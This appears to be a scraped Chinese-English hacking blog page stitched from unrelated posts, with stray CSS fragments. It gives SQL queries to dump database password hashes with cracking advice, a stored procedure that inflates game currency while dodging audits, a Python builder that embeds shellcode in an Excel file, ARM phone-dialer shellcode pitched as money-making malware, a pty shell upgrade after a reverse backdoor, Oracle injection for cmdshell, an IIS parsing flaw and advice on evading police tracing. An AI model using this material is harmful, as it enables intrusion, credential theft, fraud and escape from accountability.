0xf3sec

各种数据库密码hash获取语句，也可以直接使用sqlmap这个注入工具！

SQL Server 2000:-
SELECT password from master.dbo.sysxlogins where name=’sa’
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
0×0100- constant header
34767D5C- salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash

SQL server 2005:-
SELECT password_hash FROM sys.sql_logins where name=’sa’
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0×0100- constant header
993BF231-salt
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
crack case sensitive hash in cain, try brute force and dictionary based attacks.

update:- following bernardo’s comments:-
use function fn_varbintohexstr() to cast password in a hex string.
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins

MYSQL:-
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.

*mysql < 4.1
mysql> SELECT PASSWORD(‘mypass’);
+——————–+
| PASSWORD(‘mypass’) |
+——————–+
| 6f8c114b58f2ce9e |
+——————–+

*mysql >=4.1
mysql> SELECT PASSWORD(‘mypass’);
+——————————————-+
| PASSWORD(‘mypass’) |
+——————————————-+
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+——————————————-+
Select user, password from mysql.user
The hashes can be cracked in ‘cain and abel’

Postgres:-
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
select usename, passwd from pg_shadow;
usename | passwd
——————+————————————-
testuser | md5fabb6d7172aadfda4753bf0507ed4396
use mdcrack to crack these hashes:-
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396

Oracle:-
select name, password, spare4 from sys.user$
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
More on Oracle later, i am a bit bored….

[==============================================================================]
[---------------------------[ Hacking Bash History ]—————————]
[==============================================================================]

By: ithilgore – ithilgore.ryu.L@gmail.com
July 2008

————-[ Table of Contents ]————-

i. Preface
ii. Hardening bash_history
iii. Attacking the logging mechanism
iv. Hacking bash – interfacing with syslog
v. Conclusion
vi. References

[ i. Preface ]
==============

Bash is probably the most widely used shell in the *nix world and one of it’s
features is the history mechanism. The history mechanism is mainly used for the
user’s convenience – less typing -> work done faster. However, it has been
discussed that bash_history can also be used as a logging mechanism to monitor
users’ activity. This article covers the arguments against the above and why the
mechanism is useless against someone who thinks out of the box. We are going
to see that every defensive measure taken for protecting the history file can
be subverted with little or no difficulty. The discussion will be increasive
in the strictness of the methods applied but that doesn’t meant they will be
increasingly difficult to implement. Most of them are no-brainers. In the end,
we are going to meddle with the bash source code to make the logging mechanism
(at first sight) “invincible” and we are going to see why even that can fail.

[ ii. Hardening bash_history ]
==============================

Suppose you are an administrator of a shell-providing box and there is a really
pesky user whose activities you would like to monitor, since you are really
suspicious about what he does late at night with the precious CPU power and
system resources that you have pledged to protect against malicious (or other)
usage. Let’s call the user Bob – enough of using Trinity as the “bad” one all
the time. Since all users use bash as their default shell in the server, you
start making a few changes to the bash configuration files.

// Step 1 //

– Make the bash history and relevant files undeletable/unchangeable.

The first thing Bob would probably do would be to symlink his history to
/dev/null.
阅读全文…

1.
select dbo.DoAlzXor(999) //999代表要刷的钱
返回一个负数.-5108668643680970581

2.
使用存储过程,避过太过于明显的审计.//注意他后面会不会加入我们这个存储过程,因为取名太象了.
CREATE PROCEDURE cabal_tool_character_ex( @characteridx int,@LEV int,@Alz bigint , @encrypted bigint)
AS
BEGIN
BEGIN TRAN
BEGIN
UPDATE cabal_character_table
SET LEV= @LEV,
SET Alz = @Alz,
Reserved1 = @encrypted
where characteridx = @characteridx
END
COMMIT TRAN
END
GO

3.确定要刷用户的信息

SELECT * FROM cabal_character_table WHERE CharacterIdx= 751576
4.
调用存储过程
exec cabal_tool_character_ex 751576,100,200000,-5108668643680970581
//用户id,金钱值,Reserved1值
5. drop PROCEDURE cabal_tool_character_ex

其他办法：

CREATE PROC cabal_guild_event_log
@UserNums int,
@mon bigint
as
DECLARE @reserv bigint
DELETE from cabal_warehouse_table WHERE UserNum = @UserNums
INSERT cabal_warehouse_table (UserNum, Data, Reserved1) VALUES ( @UserNums, 0x, DBO.DoAlzXor(@mon))
set @reserv = (select reserved1 from dbo.cabal_warehouse_table where usernum = @UserNums)
exec cabal_tool_SetWarehouseAlz @UserNums, @mon, @reserv
GO
__________________
DECLARE @RC int
DECLARE @characteridx int
DECLARE @Alz bigint
DECLARE @encrypted bigint
SELECT @characteridx = 704784
SELECT @Alz = 999
SELECT @encrypted = -5108668643680970581
EXEC @RC = [SERVER01].[dbo].[cabal_tool_character_ex] @characteridx, @Alz, @encrypted
DECLARE @PrnLine nvarchar(4000)
PRINT ‘Stored Procedure: SERVER01.dbo.cabal_tool_character_ex’
SELECT @PrnLine = ‘ Return Code = ‘ + CONVERT(nvarchar, @RC)
PRINT @PrnLine

microsoft Yahei Mono’, ‘Microsoft Yahei’, sans-serif; white-space: normal; orphans: 2; letter-spacing: normal; color: rgb(0,0,0); word-spacing: 0px; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; -webkit-text-decorations-in-effect: none; -webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px”>

import sys  
   
def main():  
      
    try:  
        fdR = open('src.xls', 'rb+')  
        strTotal = fdR.read()  
        str1 = strTotal[:36640]  
        str2 = strTotal[37440:]  
                   
        # shellcode calc.exe  
        shellcode = '\x90\x90\x90\x89\xE5\xD9\xEE\xD9\x75\xF4\x5E\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5A\x6A\x41\x58\x50\x30\x41\x30\x41\x6B\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4A\x49\x4B\x4C\x4B\x58\x51\x54\x43\x30\x43\x30\x45\x50\x4C\x4B\x51\x55\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x44\x38\x45\x51\x4A\x4F\x4C\x4B\x50\x4F\x44\x58\x4C\x4B\x51\x4F\x47\x50\x45\x51\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43\x31\x4A\x4E\x46\x51\x49\x50\x4A\x39\x4E\x4C\x4C\x44\x49\x50\x42\x54\x45\x57\x49\x51\x48\x4A\x44\x4D\x45\x51\x49\x52\x4A\x4B\x4B\x44\x47\x4B\x46\x34\x46\x44\x45\x54\x43\x45\x4A\x45\x4C\x4B\x51\x4F\x47\x54\x43\x31\x4A\x4B\x43\x56\x4C\x4B\x44\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C\x4C\x4B\x43\x31\x4A\x4B\x4C\x49\x51\x4C\x47\x54\x45\x54\x48\x43\x51\x4F\x46\x51\x4C\x36\x43\x50\x46\x36\x45\x34\x4C\x4B\x50\x46\x50\x30\x4C\x4B\x47\x30\x44\x4C\x4C\x4B\x44\x30\x45\x4C\x4E\x4D\x4C\x4B\x42\x48\x44\x48\x4D\x59\x4B\x48\x4B\x33\x49\x50\x43\x5A\x46\x30\x45\x38\x4C\x30\x4C\x4A\x45\x54\x51\x4F\x42\x48\x4D\x48\x4B\x4E\x4D\x5A\x44\x4E\x50\x57\x4B\x4F\x4A\x47\x43\x53\x47\x4A\x51\x4C\x50\x57\x51\x59\x50\x4E\x50\x44\x50\x4F\x46\x37\x50\x53\x51\x4C\x43\x43\x42\x59\x44\x33\x43\x44\x43\x55\x42\x4D\x50\x33\x50\x32\x51\x4C\x42\x43\x45\x31\x42\x4C\x42\x43\x46\x4E\x45\x35\x44\x38\x42\x45\x43\x30\x41\x41' 
           
        if len(shellcode) > 800:  
            print "[*] Error : Shellcode length is long"  
            return  
        if len(shellcode) <= 800:  
            dif = 800 - len(shellcode)  
            while dif > 0 :  
                shellcode += '\x90'  
                difdif = dif - 1  
                   
        fdW= open('exploit.xls', 'wb+')  
        fdW.write(str1)      
        fdW.write(shellcode)  
        fdW.write(str2)  
           
        fdW.close()  
        fdR.close()  
        print '[-] Excel file generated'  
    except IOError:  
        print '[*] Error : An IO error has occurred'  
        print '[-] Exiting ...'  
        sys.exit(-1)  
                   
if __name__ == '__main__':  
    main()  

/*  
   
Device: HTC Touch2  
System: Windows Mobile 6.5 TR (WinCE 5.0.2)  
   
Coded by Celil ‹n¸ver from SecurityArchitect  
   
Contact:  
    celilunuver[n*spam]gmail.com  
    www.securityarchitect.org  
    blog.securityarchitect.org  
   
   
Notes: thats a PhoneCall Shellcode! Do you remember the time of dialers? Dial-up Modem times? ;)  
   
now is it the time of mobile dialers and malwares to make $$ ? :)  
   
   
        EXPORT  start  
        AREA    .text, CODE  
start  
        ldr R12, =0x3f6272c  
        adr r0, lib  
        mov lr, pc  
        mov pc, r12  
        ldr r12, =0x2e806dc  
        adr r0, num  
        mov r3, #0  
        mov r2, #0  
        mov r1, #0  
        mov lr, pc  
        mov pc, r12  
   
lib     dcb "c",0,"e",0,"l",0,"l",0,"c",0,"o",0,"r",0,"e",0,0,0,0,0  
num     dcb "3",0,"1",0,"3",0,"3",0,"7",0,0,0  
        ALIGN  
   
        END  
   
 dumpbin /disasm:  
   
00011000: E59FC044 ldr       r12, [pc, #0x44]  
00011004: E28F0020 add       r0, pc, #0x20  
00011008: E1A0E00F mov       lr, pc  
0001100C: E1A0F00C mov       pc, r12  
00011010: E59FC038 ldr       r12, [pc, #0x38]  
00011014: E28F0024 add       r0, pc, #0x24  
00011018: E3A03000 mov       r3, #0  
0001101C: E3A02000 mov       r2, #0  
00011020: E3A01000 mov       r1, #0  
00011024: E1A0E00F mov       lr, pc  
00011028: E1A0F00C mov       pc, r12  
0001102C: 00650063 rsbeq     r0, r5, r3, rrx  
00011030: 006C006C rsbeq     r0, r12, r12, rrx  
00011034: 006F0063 rsbeq     r0, pc, r3, rrx  
00011038: 00650072 rsbeq     r0, r5, r2, ror r0  
0001103C: 00000000 andeq     r0, r0, r0  
00011040: 00310033 eoreqs    r0, r1, r3, lsr r0  
00011044: 00330033 eoreqs    r0, r3, r3, lsr r0  
00011048: 00000037 andeq     r0, r0, r7, lsr r0  
0001104C: 03F6272C  
00011050: 02E806DC rsceq     r0, r8, #0xDC, 12  
   
   
"i don't think we have any imperfections; we perfectly are what we are."  
   
*/  
   
#include <stdio.h> 
#include <windows.h> 
   
int shellcode[] =  
{  
0xE59FC044,  
0xE28F0020,  
0xE1A0E00F,  
0xE1A0F00C,  
0xE59FC038,  
0xE28F0024,  
0xE3A03000,  
0xE3A02000,  
0xE3A01000,  
0xE1A0E00F,  
0xE1A0F00C,  
0x00650063,  
0x006C006C,  
0x006F0063,  
0x00650072,  
0x00000000,  
0x00310033,  
0x00330033,  
0x00000037,  
0x03F6272C,  
0x02E806DC,  
};  
   
int WINAPI WinMain( HINSTANCE hInstance,  
                    HINSTANCE hPrevInstance,  
                    LPTSTR    lpCmdLine,  
                    int       nCmdShow)  
{  
    ((void (*)(void)) & shellcode)();  
   
    return 0;  
}  

古语有云：天网恢恢、疏而不漏！这句话是真的么？现实社会中我不知道。但是在互联网上，这句话在Internet上是很软弱的。读完我这篇文，就可以知道。在网络上触犯现行法律，即便于公安部门立案调查，未必就“落入法网”  注：本文仅做技术研讨，并非讨论如何在犯罪后逃脱法律的惩罚。

首先来认识一下：“网监”也就是公安部门分管网络的部门。他们负责网络监管，如网站和服务器被黑、游戏帐号装备被盗、网络上的各种纠纷、色情`反现zhengfu的内容。都属于网监处理。
我们来假设一个案例：163.com主站被入侵，服务器硬盘全部多次格式化，并且重复读写垃圾数据，导致硬盘数据无法进行恢复，损失惨重。于是在召集专家紧急修复服务器数据的同时，163.COM公司迅速向广州网监报案。广州网监介入调查，追踪此次入侵者！

如果你是入侵者，你面对这样的情况。你会怎么办？其实很多同行在侵入别人网站、服务器、内部网络的同时，都不太懂得如何保护自己。如果你们不注意隐藏自己，用不了一天，网监部门就可以锁定你家祖宗十八代-_-!!!，如果隐藏的好，等这个案子过了法律追究期限，也是个无头案。而这，在Internet上来说，是易如反掌！

首先，我们来了解下`网监部门如何追踪入侵者，锁定他在何处作案。大家一般都知道，当你黑掉一个网站的时候，你在WEB的操作。都会或多或少的被记录在对方WEB服务器日志上。IIS和Apache都是会记录一些IIS日志。如果你入侵一家网站，被记录下IP地址一点也不奇怪。就算一般浏览网站，也会被记录下IP，当你在浏览网站执行一个操作的时候，IIS服务器就会进行一次记录，比如说发生一次连接错误。这就更不谈你侵入他人网站会不会留下IP记录，这是绝对会留下的。

当你侵入一台服务器呢？在你进入服务器的时候，首先WINDOWS系统就会对你的连接IP进行记录，其次在网关服务器上。也会记录连接进入服务器的IP。所以即便于你能够把服务器上的记录给删除，而网关上的记录，你永远也碰不到。

公安部门在锁定做案者的时候，首先就是要找到做案者，如何找到？最重要的就是追踪IP了。

阅读全文…

by：vitter@safechina.net
blog：blog.securitycn.net

用nst的反弹后门连上nc后不能su交互，报错如下：
standard in must be a tty
解决方法：
python -c ‘import pty; pty.spawn(“/bin/sh”)’
得到shell就可以su进行交互了。

阅读全文…

原文发表在黑客手册
linx 2008.1.12

介绍一个在web上通过oracle注入直接取得主机cmdshell的方法。

以下的演示都是在web上的sql plus执行的，在web注入时 把select SYS.DBMS_EXPORT_EXTENSION…..改成
/xxx.jsp?id=1 and ’1′<>’a'||(select SYS.DBMS_EXPORT_EXTENSION…..)
的形式即可。(用” ‘a’|| “是为了让语句返回true值)

语句有点长，可能要用post提交。

阅读全文…

漏洞介绍：IIS是微软推出的一款webserver，使用较为广泛，在支持asp/asp.net的同时还可以较好的支持PHP等其他语言的运行。但是80sec发现在IIS的较高版本中存在一个比较严重的安全问题，在按照网络上提供的默认配置情况下可能导致服务器泄露服务器端脚本源码，也可能错误的将任何类型的文件以PHP的方式进行解析，使得恶意的攻击者可能攻陷支持PHP的IIS服务器，特别是虚拟主机用户可能受的影响较大。 
漏洞分析：
IIS支持以CGI的方式运行PHP，但是此种模式下，IIS处理请求的时候可能导致一些同80sec提到的nginx安全漏洞一样的问题，任何用户可以远程将任何类型的文件以PHP的方式去解析，你可以通过查看Phpinfo中对php的支持方式，其中如果为CGI/FAST-CGI就可能存在这个问题。 

黑盒访问